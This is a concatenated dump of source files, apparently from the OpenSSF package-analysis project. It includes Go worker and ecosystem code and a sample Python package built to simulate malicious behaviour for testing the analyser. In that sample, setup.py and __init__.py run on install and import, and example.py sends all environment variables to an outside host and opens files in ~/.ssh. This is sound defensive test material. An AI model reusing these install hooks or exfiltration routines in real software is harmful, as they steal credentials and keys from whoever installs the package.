19 | // retrieveExecutionLog copies the execution log back from the sandbox
20 | // to the host, so it can be included in the dynamic analysis results.
21 | // To mitigate against binary code injection, all control characters except
22 | // tab and newline are stripped from the file.
23 | func retrieveExecutionLog(ctx context.Context, sb sandbox.Sandbox) (string, error) {
24 | 	executionLogDir, err := os.MkdirTemp("", "")
25 | 	if err != nil {
26 | 		return "", err
27 | 	}
28 | 
29 | 	defer os.RemoveAll(executionLogDir)
30 | 	hostExecutionLogPath := filepath.Join(executionLogDir, "execution.log")
31 | 
32 | 	// if the copy fails, it could be that the execution log is not actually present.
33 | 	// For now, we'll just log the error and otherwise ignore it
34 | 	if err := sb.CopyBackToHost(ctx, hostExecutionLogPath, sandboxExecutionLogPath); err != nil {
35 | 		slog.WarnContext(ctx, "Could not retrieve execution log from sandbox", "error", err)
36 | 		return "", nil
37 | 	}
38 | 
39 | 	logData, err := os.ReadFile(hostExecutionLogPath)
40 | 	if err != nil {
41 | 		return "", err
42 | 	}
43 | 
44 | 	// remove control characters except tab (\x09) and newline (\x0A)
45 | 	processedLog := nonSpaceControlChars.ReplaceAllLiteral(logData, []byte{})
46 | 	slog.InfoContext(ctx, "Read execution log", "rawLength", len(logData), "processedLength", len(processedLog))
47 | 
48 | 	return string(processedLog), nil
49 | }
50 | 


--------------------------------------------------------------------------------
/internal/worker/logging.go:
--------------------------------------------------------------------------------
 1 | package worker
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"errors"
 6 | 	"log/slog"
 7 | 	"os/exec"
 8 | 
 9 | 	"github.com/ossf/package-analysis/internal/analysis"
10 | 	"github.com/ossf/package-analysis/internal/log"
11 | 	"github.com/ossf/package-analysis/internal/pkgmanager"
12 | 	"github.com/ossf/package-analysis/pkg/api/analysisrun"
13 | )
14 | 
15 | /*
16 | NOTE: These strings are referenced externally by infrastructure for dashboard
17 | reporting / metrics purposes, and so should be changed with care.
18 | 
19 | See file infra/terraform/metrics/log_metrics.tf.
20 | */
21 | const (
22 | 	analysisCompleteLogMsg = "Analysis completed sucessfully" // TODO sucessfully -> successfully
23 | 	analysisErrorLogMsg    = "Analysis error - analysis"
24 | 	timeoutErrorLogMsg     = "Analysis error - timeout"
25 | 	otherErrorLogMsg       = "Analysis error - other"
26 | 	runErrorLogMsg         = "Analysis run failed"
27 | )
28 | 
29 | // LogDynamicAnalysisError indicates some error happened while attempting to run
30 | // the package code, which was not caused by the package itself. This means it was
31 | // not possible to analyse the package properly, and the results are invalid.
32 | func LogDynamicAnalysisError(ctx context.Context, pkg *pkgmanager.Pkg, errorPhase analysisrun.DynamicPhase, err error) {
33 | 	slog.ErrorContext(ctx, runErrorLogMsg,
34 | 		log.Label("phase", string(errorPhase)),
35 | 		"error", err)
36 | 
37 | 	var exitErr *exec.ExitError
38 | 	if errors.As(err, &exitErr) {
39 | 		slog.DebugContext(ctx, "Command stderr", "stderr", exitErr.Stderr)
40 | 	}
41 | }
42 | 
43 | // LogDynamicAnalysisResult indicates that the package code was run successfully,
44 | // and what happened when it was run. This may include errors in the analysis
45 | // of the package, but not errors in the running itself.
46 | func LogDynamicAnalysisResult(ctx context.Context, pkg *pkgmanager.Pkg, finalPhase analysisrun.DynamicPhase, finalStatus analysis.Status) {
47 | 	labels := []interface{}{
48 | 		log.Label("last_phase", string(finalPhase)),
49 | 	}
50 | 
51 | 	switch finalStatus {
52 | 	case analysis.StatusCompleted:
53 | 		slog.InfoContext(ctx, analysisCompleteLogMsg, labels...)
54 | 	case analysis.StatusErrorAnalysis:
55 | 		slog.WarnContext(ctx, analysisErrorLogMsg, labels...)
56 | 	case analysis.StatusErrorTimeout:
57 | 		slog.WarnContext(ctx, timeoutErrorLogMsg, labels...)
58 | 	case analysis.StatusErrorOther:
59 | 		slog.WarnContext(ctx, otherErrorLogMsg, labels...)
60 | 	}
61 | }
62 | 


--------------------------------------------------------------------------------
/internal/worker/resolvepackage.go:
--------------------------------------------------------------------------------
 1 | package worker
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 
 6 | 	"github.com/package-url/packageurl-go"
 7 | 
 8 | 	"github.com/ossf/package-analysis/internal/pkgmanager"
 9 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
10 | )
11 | 
12 | // ResolvePkg creates a Pkg object with the arguments passed to the worker process.
13 | func ResolvePkg(manager *pkgmanager.PkgManager, name, version, localPath string) (pkg *pkgmanager.Pkg, err error) {
14 | 	switch {
15 | 	case localPath != "":
16 | 		pkg = manager.Local(name, version, localPath)
17 | 	case version != "":
18 | 		pkg = manager.Package(name, version)
19 | 	default:
20 | 		pkg, err = manager.Latest(name)
21 | 		if err != nil {
22 | 			return nil, fmt.Errorf("failed to get latest version: %w", err)
23 | 		}
24 | 		if pkg.Version() == "" {
25 | 			return nil, fmt.Errorf("unknown package name '%s'", name)
26 | 		}
27 | 	}
28 | 	return pkg, nil
29 | }
30 | 
31 | // ResolvePurl creates a Pkg object from the given purl
32 | // See https://github.com/package-url/purl-spec
33 | func ResolvePurl(purl packageurl.PackageURL) (*pkgmanager.Pkg, error) {
34 | 	ecosystem, err := pkgecosystem.ParsePurlType(purl.Type)
35 | 	if err != nil {
36 | 		return nil, err
37 | 	}
38 | 
39 | 	manager := pkgmanager.Manager(ecosystem)
40 | 	if manager == nil {
41 | 		return nil, pkgecosystem.Unsupported(purl.Type)
42 | 	}
43 | 
44 | 	// Prepend package namespace to package name, if present
45 | 	var pkgName string
46 | 	if purl.Namespace != "" {
47 | 		pkgName = purl.Namespace + "/" + purl.Name
48 | 	} else {
49 | 		pkgName = purl.Name
50 | 	}
51 | 
52 | 	// Get the latest package version if not specified in the purl
53 | 	pkg, err := ResolvePkg(manager, pkgName, purl.Version, "")
54 | 	if err != nil {
55 | 		return nil, err
56 | 	}
57 | 
58 | 	return pkg, nil
59 | }
60 | 


--------------------------------------------------------------------------------
/internal/worker/sandbox_options.go:
--------------------------------------------------------------------------------
 1 | package worker
 2 | 
 3 | import (
 4 | 	"github.com/ossf/package-analysis/internal/sandbox"
 5 | )
 6 | 
 7 | // StaticSandboxOptions provides a set of sandbox options necessary to run the
 8 | // static analysis sandboxes.
 9 | func StaticSandboxOptions() []sandbox.Option {
10 | 	return []sandbox.Option{
11 | 		sandbox.Image(defaultStaticAnalysisImage),
12 | 		sandbox.EchoStdErr(),
13 | 	}
14 | }
15 | 
16 | // DynamicSandboxOptions provides a set of sandbox options necessary to run
17 | // dynamic analysis sandboxes.
18 | func DynamicSandboxOptions() []sandbox.Option {
19 | 	return []sandbox.Option{
20 | 		sandbox.Image(defaultDynamicAnalysisImage),
21 | 		sandbox.EnableStrace(),
22 | 		sandbox.EnableRawSockets(),
23 | 		sandbox.EnablePacketLogging(),
24 | 		sandbox.LogStdOut(),
25 | 		sandbox.LogStdErr(),
26 | 	}
27 | }
28 | 


--------------------------------------------------------------------------------
/internal/worker/savefilewriteresults.go:
--------------------------------------------------------------------------------
 1 | package worker
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"errors"
 6 | 	"fmt"
 7 | 
 8 | 	"github.com/ossf/package-analysis/internal/pkgmanager"
 9 | 	"github.com/ossf/package-analysis/internal/resultstore"
10 | 	"github.com/ossf/package-analysis/internal/utils"
11 | 	"github.com/ossf/package-analysis/pkg/api/analysisrun"
12 | )
13 | 
14 | func saveFileWriteResults(rs *resultstore.ResultStore, ctx context.Context, pkg *pkgmanager.Pkg, data analysisrun.DynamicAnalysisData) error {
15 | 	if rs == nil {
16 | 		// TODO this should become a method on resultstore.ResultStore?
17 | 		return errors.New("resultstore is nil")
18 | 	}
19 | 
20 | 	if err := rs.SaveDynamicAnalysis(ctx, pkg, data.FileWritesSummary, ""); err != nil {
21 | 		return fmt.Errorf("failed to upload file write analysis to blobstore = %w", err)
22 | 	}
23 | 	var allPhasesWriteBufferIdsArray []string
24 | 	for _, writeBufferIds := range data.FileWriteBufferIds {
25 | 		allPhasesWriteBufferIdsArray = append(allPhasesWriteBufferIdsArray, writeBufferIds...)
26 | 	}
27 | 
28 | 	// Remove potential duplicates across phases.
29 | 	allPhasesWriteBufferIdsArray = utils.RemoveDuplicates(allPhasesWriteBufferIdsArray)
30 | 	version := pkg.Version()
31 | 	if err := rs.SaveTempFilesToZip(ctx, pkg, "write_buffers_"+version, allPhasesWriteBufferIdsArray); err != nil {
32 | 		return fmt.Errorf("failed to upload file write buffer results to blobstore = #{err}")
33 | 	}
34 | 	if err := utils.RemoveTempFilesDirectory(); err != nil {
35 | 		return fmt.Errorf("failed to remove temp files = #{err}")
36 | 	}
37 | 	return nil
38 | }
39 | 


--------------------------------------------------------------------------------
/osv-scanner.toml:
--------------------------------------------------------------------------------
1 | [[IgnoredVulns]]
2 | id = "CVE-2020-8911"
3 | reason = "Indirect dependency, vulnerable function is probably not used and we can't do much about it anyway"
4 | 
5 | [[IgnoredVulns]]
6 | id = "GO-2022-0646"
7 | reason = "alias of CVE-2020-8911"
8 | 


--------------------------------------------------------------------------------
/pkg/api/analysisrun/key.go:
--------------------------------------------------------------------------------
 1 | package analysisrun
 2 | 
 3 | import (
 4 | 	"strings"
 5 | 
 6 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 7 | )
 8 | 
 9 | type Key struct {
10 | 	Ecosystem pkgecosystem.Ecosystem `json:"Ecosystem"`
11 | 	Name      string                 `json:"Name"`
12 | 	Version   string                 `json:"Version"`
13 | }
14 | 
15 | func (k Key) String() string {
16 | 	return strings.Join([]string{string(k.Ecosystem), k.Name, k.Version}, "-")
17 | }
18 | 


--------------------------------------------------------------------------------
/pkg/api/analysisrun/key_test.go:
--------------------------------------------------------------------------------
 1 | package analysisrun_test
 2 | 
 3 | import (
 4 | 	"testing"
 5 | 
 6 | 	"github.com/ossf/package-analysis/pkg/api/analysisrun"
 7 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
 8 | )
 9 | 
10 | func TestStringify(t *testing.T) {
11 | 	tests := map[string]struct {
12 | 		input    analysisrun.Key
13 | 		expected string
14 | 	}{
15 | 		"simple stringify": {
16 | 			input:    analysisrun.Key{Name: "genericpackage", Version: "2.05.0", Ecosystem: pkgecosystem.NPM},
17 | 			expected: "npm-genericpackage-2.05.0",
18 | 		},
19 | 		"pkg name with space": {
20 | 			input:    analysisrun.Key{Name: "cool package", Version: "1.0.0", Ecosystem: pkgecosystem.PyPI},
21 | 			expected: "pypi-cool package-1.0.0",
22 | 		},
23 | 		"pkg name with forward slash": {
24 | 			input:    analysisrun.Key{Name: "@ada/evilpackage", Version: "99.0.0", Ecosystem: pkgecosystem.NPM},
25 | 			expected: "npm-@ada/evilpackage-99.0.0",
26 | 		},
27 | 	}
28 | 
29 | 	for name, test := range tests {
30 | 		t.Run(name, func(t *testing.T) {
31 | 			got := test.input.String()
32 | 			expected := test.expected
33 | 			if got != expected {
34 | 				t.Fatalf("%v: returned %v; expected %v", name, got, expected)
35 | 			}
36 | 		})
37 | 	}
38 | }
39 | 


--------------------------------------------------------------------------------
/pkg/api/analysisrun/phase.go:
--------------------------------------------------------------------------------
 1 | package analysisrun
 2 | 
 3 | // DynamicPhase represents a way to 'run' a package during its usage lifecycle.
 4 | // This is relevant to dynamic analysis.
 5 | type DynamicPhase string
 6 | 
 7 | const (
 8 | 	DynamicPhaseExecute DynamicPhase = "execute"
 9 | 	DynamicPhaseImport  DynamicPhase = "import"
10 | 	DynamicPhaseInstall DynamicPhase = "install"
11 | )
12 | 
13 | // DefaultDynamicPhases the subset of AllDynamicPhases that are supported
14 | // by every ecosystem, and are run by default for dynamic analysis.
15 | func DefaultDynamicPhases() []DynamicPhase {
16 | 	return []DynamicPhase{DynamicPhaseInstall, DynamicPhaseImport}
17 | }
18 | 
19 | // AllDynamicPhases lists each phase of dynamic analysis in order
20 | // that they are run. Each phase depends on the previous phases.
21 | func AllDynamicPhases() []DynamicPhase {
22 | 	return []DynamicPhase{DynamicPhaseInstall, DynamicPhaseImport, DynamicPhaseExecute}
23 | }
24 | 


--------------------------------------------------------------------------------
/pkg/api/notification/notification.go:
--------------------------------------------------------------------------------
 1 | package notification
 2 | 
 3 | import (
 4 | 	"github.com/ossf/package-analysis/pkg/api/analysisrun"
 5 | )
 6 | 
 7 | // AnalysisRunComplete is a struct representing the message sent to notify when
 8 | // a package analysis run is complete.
 9 | type AnalysisRunComplete struct {
10 | 	Key analysisrun.Key
11 | }
12 | 


--------------------------------------------------------------------------------
/pkg/api/pkgecosystem/ecosystem.go:
--------------------------------------------------------------------------------
  1 | // Package pkgecosystem defines the open source ecosystems supported by Package Analysis.
  2 | package pkgecosystem
  3 | 
  4 | import (
  5 | 	"errors"
  6 | 	"fmt"
  7 | )
  8 | 
  9 | // Ecosystem represents an open source package ecosystem from which packages can be downloaded.
 10 | //
 11 | // It implements encoding.TextUnmarshaler and encoding.TextMarshaler so it can
 12 | // be used with flag.TextVar.
 13 | type Ecosystem string
 14 | 
 15 | const (
 16 | 	None      Ecosystem = ""
 17 | 	CratesIO  Ecosystem = "crates.io"
 18 | 	NPM       Ecosystem = "npm"
 19 | 	Packagist Ecosystem = "packagist"
 20 | 	PyPI      Ecosystem = "pypi"
 21 | 	RubyGems  Ecosystem = "rubygems"
 22 | )
 23 | 
 24 | // ErrUnsupported is returned by Ecosystem.UnmarshalText when bytes that do not
 25 | // correspond to a defined ecosystem constant is passed in as a parameter.
 26 | var ErrUnsupported = errors.New("ecosystem unsupported")
 27 | 
 28 | // Unsupported returns a new ErrUnsupported that adds the unsupported ecosystem name
 29 | // to the error message
 30 | func Unsupported(name string) error {
 31 | 	return fmt.Errorf("%w: %s", ErrUnsupported, name)
 32 | }
 33 | 
 34 | // SupportedEcosystems is a list of all the ecosystems supported.
 35 | var SupportedEcosystems = []Ecosystem{
 36 | 	CratesIO,
 37 | 	NPM,
 38 | 	Packagist,
 39 | 	PyPI,
 40 | 	RubyGems,
 41 | }
 42 | 
 43 | // SupportedEcosystemsStrings is the list of supported ecosystems represented as
 44 | // strings.
 45 | var SupportedEcosystemsStrings = EcosystemsAsStrings(SupportedEcosystems)
 46 | 
 47 | // UnmarshalText implements the encoding.TextUnmarshaler interface.
 48 | //
 49 | // It will only succeed when unmarshaling ecosytems in SupportedEcosystems or
 50 | // empty.
 51 | func (e *Ecosystem) UnmarshalText(text []byte) error {
 52 | 	ecosystem, err := Parse(string(text))
 53 | 
 54 | 	if err != nil {
 55 | 		return err
 56 | 	}
 57 | 
 58 | 	*e = ecosystem
 59 | 	return nil
 60 | }
 61 | 
 62 | // MarshalText implements the encoding.TextMarshaler interface.
 63 | func (e Ecosystem) MarshalText() ([]byte, error) {
 64 | 	return []byte(e), nil
 65 | }
 66 | 
 67 | // String implements the fmt.Stringer interface.
 68 | func (e Ecosystem) String() string {
 69 | 	return string(e)
 70 | }
 71 | 
 72 | // EcosystemsAsStrings converts a slice of Ecosystems to a string slice.
 73 | func EcosystemsAsStrings(es []Ecosystem) []string {
 74 | 	var s []string
 75 | 	for _, e := range es {
 76 | 		s = append(s, e.String())
 77 | 	}
 78 | 	return s
 79 | }
 80 | 
 81 | // Parse returns an Ecosystem corresponding to the given string name, or
 82 | // the None ecosystem along with an error if there is no matching Ecosystem.
 83 | // If name == "", then the None ecosystem is returned with no error.
 84 | func Parse(name string) (Ecosystem, error) {
 85 | 	for _, s := range append(SupportedEcosystems, None) {
 86 | 		if string(s) == name {
 87 | 			return s, nil
 88 | 		}
 89 | 	}
 90 | 
 91 | 	return None, Unsupported(name)
 92 | }
 93 | 
 94 | // ParsePurlType converts from a Package URL type, defined at
 95 | // https://github.com/package-url/purl-spec/blob/master/PURL-TYPES.rst
 96 | // to an Ecosystem object
 97 | func ParsePurlType(purlType string) (Ecosystem, error) {
 98 | 	switch purlType {
 99 | 	case "cargo":
100 | 		return CratesIO, nil
101 | 	case "composer":
102 | 		return Packagist, nil
103 | 	case "gem":
104 | 		return RubyGems, nil
105 | 	default:
106 | 		// we use the same name for NPM and PyPI as the purl type string
107 | 		return Parse(purlType)
108 | 	}
109 | }
110 | 


--------------------------------------------------------------------------------
/pkg/api/pkgecosystem/ecosystem_test.go:
--------------------------------------------------------------------------------
  1 | package pkgecosystem_test
  2 | 
  3 | import (
  4 | 	"bytes"
  5 | 	"testing"
  6 | 
  7 | 	"github.com/ossf/package-analysis/pkg/api/pkgecosystem"
  8 | 	"golang.org/x/exp/slices"
  9 | )
 10 | 
 11 | func TestEcosystemMarshalText(t *testing.T) {
 12 | 	tests := []struct {
 13 | 		name string
 14 | 		eco  pkgecosystem.Ecosystem
 15 | 		want []byte
 16 | 	}{
 17 | 		{
 18 | 			name: "npm",
 19 | 			eco:  pkgecosystem.NPM,
 20 | 			want: []byte("npm"),
 21 | 		},
 22 | 		{
 23 | 			name: "unsupported",
 24 | 			eco:  pkgecosystem.Ecosystem("this is a test"),
 25 | 			want: []byte("this is a test"),
 26 | 		},
 27 | 		{
 28 | 			name: "empty",
 29 | 			eco:  pkgecosystem.None,
 30 | 			want: []byte{},
 31 | 		},
 32 | 	}
 33 | 	for _, test := range tests {
 34 | 		t.Run(test.name, func(t *testing.T) {
 35 | 			got, _ := test.eco.MarshalText()
 36 | 			if !bytes.Equal(got, test.want) {
 37 | 				t.Errorf("MarshalText() = %v; want %v", got, test.want)
 38 | 			}
 39 | 		})
 40 | 	}
 41 | }
 42 | 
 43 | func TestEcosystemUnmarshalText(t *testing.T) {
 44 | 	tests := []struct {
 45 | 		name    string
 46 | 		input   []byte
 47 | 		want    pkgecosystem.Ecosystem
 48 | 		wantErr bool
 49 | 	}{
 50 | 		{
 51 | 			name:  "npm",
 52 | 			input: []byte("npm"),
 53 | 			want:  pkgecosystem.NPM,
 54 | 		},
 55 | 		{
 56 | 			name:  "crates.io",
 57 | 			input: []byte("crates.io"),
 58 | 			want:  pkgecosystem.CratesIO,
 59 | 		},
 60 | 		{
 61 | 			name:    "unsupported",
 62 | 			input:   []byte("this is a test"),
 63 | 			wantErr: true,
 64 | 		},
 65 | 		{
 66 | 			name:  "empty",
 67 | 			input: []byte{},
 68 | 			want:  pkgecosystem.None,
 69 | 		},
 70 | 	}
 71 | 	for _, test := range tests {
 72 | 		t.Run(test.name, func(t *testing.T) {
 73 | 			var got pkgecosystem.Ecosystem
 74 | 			err := got.UnmarshalText(test.input)
 75 | 			if test.wantErr && err == nil {
 76 | 				t.Fatal("UnmarshalText() is nil; want error")
 77 | 			}
 78 | 			if !test.wantErr && err != nil {
 79 | 				t.Fatalf("UnmarshalText() = %v; want nil", err)
 80 | 			}
 81 | 			if got != test.want {
 82 | 				t.Errorf("UnmarshalText() parsed %v; want %v", got, test.want)
 83 | 			}
 84 | 		})
 85 | 	}
 86 | }
 87 | 
 88 | func TestEcosystemString(t *testing.T) {
 89 | 	tests := []struct {
 90 | 		name string
 91 | 		eco  pkgecosystem.Ecosystem
 92 | 		want string
 93 | 	}{
 94 | 		{
 95 | 			name: "npm",
 96 | 			eco:  pkgecosystem.NPM,
 97 | 			want: "npm",
 98 | 		},
 99 | 		{
100 | 			name: "unsupported",
101 | 			eco:  pkgecosystem.Ecosystem("this is a test"),
102 | 			want: "this is a test",
103 | 		},
104 | 		{
105 | 			name: "empty",
106 | 			eco:  pkgecosystem.Ecosystem(""),
107 | 			want: "",
108 | 		},
109 | 	}
110 | 	for _, test := range tests {
111 | 		t.Run(test.name, func(t *testing.T) {
112 | 			got := test.eco.String()
113 | 			if got != test.want {
114 | 				t.Errorf("String() = %v; want %v", got, test.want)
115 | 			}
116 | 		})
117 | 	}
118 | }
119 | 
120 | func TestEcosystemsAsStrings(t *testing.T) {
121 | 	want := []string{"npm", "pypi", "rubygems"}
122 | 	got := pkgecosystem.EcosystemsAsStrings([]pkgecosystem.Ecosystem{
123 | 		pkgecosystem.NPM,
124 | 		pkgecosystem.PyPI,
125 | 		pkgecosystem.RubyGems,
126 | 	})
127 | 	if !slices.Equal(got, want) {
128 | 		t.Errorf("EcosystemsAsStrings() = %v; want %v", got, want)
129 | 	}
130 | }
131 | 


--------------------------------------------------------------------------------
/pkg/api/staticanalysis/signals.go:
--------------------------------------------------------------------------------
 1 | package staticanalysis
 2 | 
 3 | // EscapedString holds a string literal that contains a lot of character escaping.
 4 | // This may indicate obfuscation.
 5 | type EscapedString struct {
 6 | 	Value           string `json:"value"`
 7 | 	Raw             string `json:"raw"`
 8 | 	LevenshteinDist int    `json:"levenshtein_dist"`
 9 | }
10 | 
11 | // SuspiciousIdentifier is an identifier that matches a specific rule intended
12 | // to pick out (potentially) suspicious names. Name stores the actual identifier,
13 | // and Rule holds the rule that the identifier matched against.
14 | type SuspiciousIdentifier struct {
15 | 	Name string `json:"name"`
16 | 	Rule string `json:"rule"`
17 | }
18 | 


--------------------------------------------------------------------------------
/pkg/api/staticanalysis/token/identifier_type.go:
--------------------------------------------------------------------------------
 1 | package token
 2 | 
 3 | import (
 4 | 	"encoding/json"
 5 | 
 6 | 	"golang.org/x/exp/maps"
 7 | )
 8 | 
 9 | // IdentifierType enumerates the possible types of a source code identifier,
10 | // encountered during static analysis.
11 | type IdentifierType int
12 | 
13 | const (
14 | 	Unknown        IdentifierType = iota
15 | 	Function                      // function declaration / definition
16 | 	Variable                      // variable declaration / definition
17 | 	Parameter                     // parameters to functions, constructors, catch blocks
18 | 	Class                         // class declaration / definition
19 | 	Member                        // access/mutation of an object member
20 | 	Property                      // declaration of class property
21 | 	StatementLabel                // loop label
22 | 	Other                         // something the parser picked up that isn't accounted for above
23 | )
24 | 
25 | var stringValues = map[IdentifierType]string{
26 | 	Unknown:        "Unknown",
27 | 	Function:       "Function",
28 | 	Variable:       "Variable",
29 | 	Parameter:      "Parameter",
30 | 	Class:          "Class",
31 | 	Member:         "Member",
32 | 	Property:       "Property",
33 | 	StatementLabel: "StatementLabel",
34 | 	Other:          "Other",
35 | }
36 | 
37 | func (t IdentifierType) String() string {
38 | 	return stringValues[t]
39 | }
40 | 
41 | // MarshalJSON serializes this IdentifierType using its string representation
42 | func (t IdentifierType) MarshalJSON() ([]byte, error) {
43 | 	return json.Marshal(t.String())
44 | }
45 | 
46 | // UnmarshalJSON deserializes an IdentifierType serialized using MarshalJSON.
47 | // If the supplied JSON contains an unrecognised name, the deserialised value is
48 | // Unknown, and no error is returned.
49 | func (t *IdentifierType) UnmarshalJSON(data []byte) error {
50 | 	var name string
51 | 	if err := json.Unmarshal(data, &name); err != nil {
52 | 		return err
53 | 	}
54 | 
55 | 	*t = ParseIdentifierType(name)
56 | 	return nil
57 | }
58 | 
59 | func IdentifierTypes() []IdentifierType {
60 | 	return maps.Keys(stringValues)
61 | }
62 | 
63 | func ParseIdentifierType(s string) IdentifierType {
64 | 	for name, stringVal := range stringValues {
65 | 		if s == stringVal {
66 | 			return name
67 | 		}
68 | 	}
69 | 	return Unknown
70 | }
71 | 


--------------------------------------------------------------------------------
/pkg/api/staticanalysis/token/position.go:
--------------------------------------------------------------------------------
 1 | package token
 2 | 
 3 | // Position records the position of a source code token
 4 | // in terms of row and column in the original source file.
 5 | type Position [2]int
 6 | 
 7 | func (pos Position) Row() int {
 8 | 	return pos[0]
 9 | }
10 | 
11 | func (pos Position) Col() int {
12 | 	return pos[1]
13 | }
14 | 


--------------------------------------------------------------------------------
/pkg/api/staticanalysis/token/tokens.go:
--------------------------------------------------------------------------------
 1 | package token
 2 | 
 3 | import (
 4 | 	"github.com/texttheater/golang-levenshtein/levenshtein"
 5 | 
 6 | 	"github.com/ossf/package-analysis/internal/staticanalysis/signals/stringentropy"
 7 | )
 8 | 
 9 | // Identifier records some kind of user-defined symbol name in source code.
10 | // Valid types of identifier are defined using IdentifierType.
11 | type Identifier struct {
12 | 	Name    string         `json:"name"`
13 | 	Type    IdentifierType `json:"type"`
14 | 	Entropy float64        `json:"entropy"`
15 | }
16 | 
17 | // ComputeEntropy computes the entropy of this identifier's name under the given
18 | // character distribution, and sets its Entropy field to the resulting value.
19 | func (i *Identifier) ComputeEntropy(probs map[rune]float64) {
20 | 	i.Entropy = stringentropy.Calculate(i.Name, probs)
21 | }
22 | 
23 | // String records a string literal occurring in the source code.
24 | type String struct {
25 | 	Value   string  `json:"value"`
26 | 	Raw     string  `json:"raw"`
27 | 	Entropy float64 `json:"entropy"`
28 | }
29 | 
30 | // ComputeEntropy computes the entropy of this string literal's value under the
31 | // given character distribution, and sets its Entropy field to the resulting value.
32 | func (s *String) ComputeEntropy(probs map[rune]float64) {
33 | 	s.Entropy = stringentropy.Calculate(s.Value, probs)
34 | }
35 | 
36 | // LevenshteinDist computes the Levenshtein distance between the parsed and raw versions of
37 | // this string literal. A character substitution is treated as deletion and insertion (2 operations).
38 | func (s *String) LevenshteinDist() int {
39 | 	return levenshtein.DistanceForStrings([]rune(s.Raw), []rune(s.Value), levenshtein.DefaultOptions)
40 | }
41 | 
42 | // Int records an integer literal occurring in source code. For languages without explicit
43 | // integer types such as JavaScript, an Int literal is any numeric literal whose raw string
44 | // representation in source code is parseable (with strconv.ParseInt) as an integer.
45 | type Int struct {
46 | 	Value int64  `json:"value"`
47 | 	Raw   string `json:"raw"`
48 | }
49 | 
50 | // Float records a floating point literal occurring in source code.
51 | type Float struct {
52 | 	Value float64 `json:"value"`
53 | 	Raw   string  `json:"raw"`
54 | }
55 | 
56 | // Comment records the entire text of a source code comment.
57 | // It may contain newline characters.
58 | type Comment struct {
59 | 	Text string `json:"text"`
60 | }
61 | 


--------------------------------------------------------------------------------
/sample_packages/Makefile:
--------------------------------------------------------------------------------
 1 | .PHONY: build_sample_python_package
 2 | 
 3 | IMAGE_NAME = sample-python-package-image
 4 | CONTAINER_NAME = sample-python-package-container
 5 | 
 6 | build_sample_python_package:
 7 | 	docker build -t ${IMAGE_NAME} sample_python_package/
 8 | 	docker run --name ${CONTAINER_NAME} -d ${IMAGE_NAME}
 9 | 	docker cp ${CONTAINER_NAME}:/sample_python_package/dist/. sample_python_package/output
10 | 	docker stop ${CONTAINER_NAME}
11 | 	docker rm ${CONTAINER_NAME}
12 | 	docker image rm ${IMAGE_NAME}
13 | 


--------------------------------------------------------------------------------
/sample_packages/README.md:
--------------------------------------------------------------------------------
 1 | ## Sample packages
 2 | 
 3 | Packages in this directory will simulate different types of malicious behavior for testing purposes. These packages should attempt to revert any modifications made, but it is not recommended to install, import, or use these packages in nonisolated settings.
 4 | 
 5 | The same license for the rest of the package analysis project applies to any package in this directory.
 6 | 
 7 | ### Sample python package
 8 | Build the package by running`make build_sample_python_package` in this directory. The .tar.gz file that can be used for local analysis will be added to the directory `sample_python_package/output`
 9 | 
10 | Developers can modify which behaviors they want to simulate. (Collection of functionalities listed above main function in example.py) Note, however, that at this time output logging may not be comprehensive.
11 | 
12 | 
13 | 


--------------------------------------------------------------------------------
/sample_packages/sample_python_package/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:3.9@sha256:edee3d665aba1d84f5344eca825d0de34b38dbf77a776cafd9df65c67e240866
 2 | 
 3 | WORKDIR /sample_python_package
 4 | 
 5 | COPY . /sample_python_package
 6 | 
 7 | RUN pip install --upgrade build
 8 | 
 9 | RUN python3 -m build
10 | 


--------------------------------------------------------------------------------
/sample_packages/sample_python_package/pyproject.toml:
--------------------------------------------------------------------------------
 1 | [build-system]
 2 | requires = ["setuptools"]
 3 | build-backend = "setuptools.build_meta"
 4 | 
 5 | [project]
 6 | name = "sample_python_package"
 7 | version = "0.0.1"
 8 | authors = [
 9 |     { name="OpenSSF <openssf-wg-securing-crit-prjs@lists.openssf.org>" },
10 | ]
11 | description = "A small example package"
12 | readme = "README.md"
13 | requires-python = ">=3.7"
14 | classifiers = [
15 |     "Programming Language :: Python :: 3",
16 |     "License :: OSI Approved :: Apache Software License",
17 |     "Operating System :: OS Independent",
18 | ]
19 | 


--------------------------------------------------------------------------------
/sample_packages/sample_python_package/setup.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import os
 3 | SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
 4 | sys.path.append(SCRIPT_DIR)
 5 | 
 6 | from setuptools import setup, find_packages
 7 | from src.example import *
 8 | 
 9 | setup(name="sample_python_package",
10 |       packages=find_packages(),)
11 | 
12 | [f("setup.py", True) for f in https_functions + access_credentials_functions]
13 | 


--------------------------------------------------------------------------------
/sample_packages/sample_python_package/src/__init__.py:
--------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
4 | sys.path.append(SCRIPT_DIR)
5 | 
6 | from example import *
7 | 
8 | [f("__init__.py", True) for f in https_functions + access_credentials_functions]
9 | 


--------------------------------------------------------------------------------
/sample_packages/sample_python_package/src/example.py:
--------------------------------------------------------------------------------
 1 | import http.client
 2 | import json
 3 | import os
 4 | 
 5 | # Sends an HTTPS post request and prints out the response.
 6 | # Exfiltrates environment variables.
 7 | def send_https_post_request(called_from: str, print_logs: bool) -> None:
 8 |   host = "www.httpbin.org"
 9 |   conn = http.client.HTTPSConnection(host)
10 |   data = {"text": f"Sending data through HTTPS from: {called_from}. Found environment variables: {str(os.environ)}"}
11 |   json_data = json.dumps(data)
12 |   conn.request("POST", "/post", json_data, headers={"Host": host})
13 |   response = conn.getresponse()
14 |   if print_logs:
15 |     print(response.read().decode())
16 | 
17 | 
18 | # Access ssh keys and attempts to read and write to them.
19 | def access_ssh_keys(called_from: str, print_logs: bool) -> None:
20 |     ssh_keys_directory_path = os.path.join(os.path.expanduser('~'), ".ssh")
21 |     if os.path.isdir(ssh_keys_directory_path):
22 |       try:
23 |         files_in_ssh_keys_directory = os.listdir(ssh_keys_directory_path)
24 |         for file_name in files_in_ssh_keys_directory:
25 |           full_file_path = os.path.join(ssh_keys_directory_path, file_name)
26 |           original_file_data = ""
27 |           with open(full_file_path, "r") as f:
